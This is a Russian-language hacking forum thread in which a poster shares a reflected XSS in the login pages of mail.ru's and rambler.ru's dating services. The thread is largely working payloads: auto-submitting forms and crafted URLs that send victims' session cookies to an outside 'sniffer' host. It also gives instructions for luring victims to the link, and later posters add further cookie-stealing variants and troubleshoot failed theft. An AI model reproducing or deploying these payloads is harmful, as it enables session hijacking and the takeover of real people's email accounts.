Форум АНТИЧАТ - XSS mail.ru rambler.ru

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - XSS mail.ru rambler.ru (https://forum.antichat.xyz/showthread.php?t=28497)

XSS mail.ru rambler.ru

Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну :)Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..

После многих часов поиска (уважайте чужой труд! ;) ) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:

Код HTML:

<input type="hidden" name="tcurl">

Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..

А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

Код HTML:

<body onload="p.submit()">

<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">

<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>

рамблер.ru

Код HTML:

<body onload="p.submit()">

<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">

<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>

СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)

С уважением slider

Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..

Вот вам ещё скриптеГ =)

Код HTML:

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

Код HTML:

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E

Засекаем время сколько бага проживет =)

Отпишитесь хоть.. КОМУ пригодилось! =)

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3 C/script%3E%22!--%3C

или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='htt p://forum.antichat.ru';</script><!--"
<a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'ht tp://forum.antichat.ru\'</script><!--"'>ФОрум</a>

я конечно не понял точно как сделал слайдер
но вот как я сделел

Мда только жаль что я ен умею этим пользоваться..

"Торопитесь время акции ограничего =)"
Мда

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

И так можно использовать!!! =)
но это как то банально!

Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.

Цитата:

Сообщение от MegaBits

Обычная пассивная xss
Жертва должна перейти по ссылке, либо быть перенаправленной на нее

Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят.
Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........ :confused: